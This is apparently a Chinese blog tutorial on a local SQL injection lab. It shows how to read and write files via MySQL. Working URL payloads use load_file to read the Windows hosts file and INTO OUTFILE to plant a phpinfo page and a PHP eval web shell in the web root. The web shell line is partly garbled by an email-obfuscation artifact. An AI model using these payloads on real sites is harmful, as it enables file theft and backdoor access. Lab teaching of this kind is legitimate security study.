sql注入之读写文件案例实验

文章目录

环境搭建
第一节前提条件
第二节读取文件操作
第三节写入文件操作
免责声明

环境搭建

Window-server2008 —phpstudy-----搭建自己的网页
sql注入之读写文件案例实验

第一节前提条件

我们也可以利用SQL 注入漏洞读写文件。但是读写文件需要一定的条件。
sql注入之读写文件案例实验
1.secure-file-priv

改参数可以写在my.ini 配置文件中[mysqld] 下。若要配置此参数，需要修改my.ini 配置文件，并重启mysql 服务。
sql注入之读写文件案例实验

2. 当前用户具有文件权限
查询语句[select File_priv from mysql.user where user="root" and host="localhost"]。
sql注入之读写文件案例实验
3 知道要写入目标文件的绝对路径

第二节读取文件操作

[?id=-33 union select 1,2,3,4,5,6,7,8,9,10,load_file('C:\\Windows\\System32\\drivers\\etc\\hosts'), 12,13,14,15 --+ ]
sql注入之读写文件案例实验

第三节写入文件操作

[?id=33%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,%27%3C?php%20phpinfo();?%3E%27,12,13,14,15%20into%20outfile%20%27c:\\phpstudy\\www\\1.php%27%20--+]，直接传入参数，页面如果不报错，说明写入成功。可以直接访问写入的文件[http://localhost/1.php]

sql注入之读写文件案例实验

[?id=33%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,%27%3C?php%[email protected]($_REQUEST[777]);?%3E%27,12,13,14,15%20into%20outfile%20%27c:\phpstudy\www\2.php%27%20–+]
sql注入之读写文件案例实验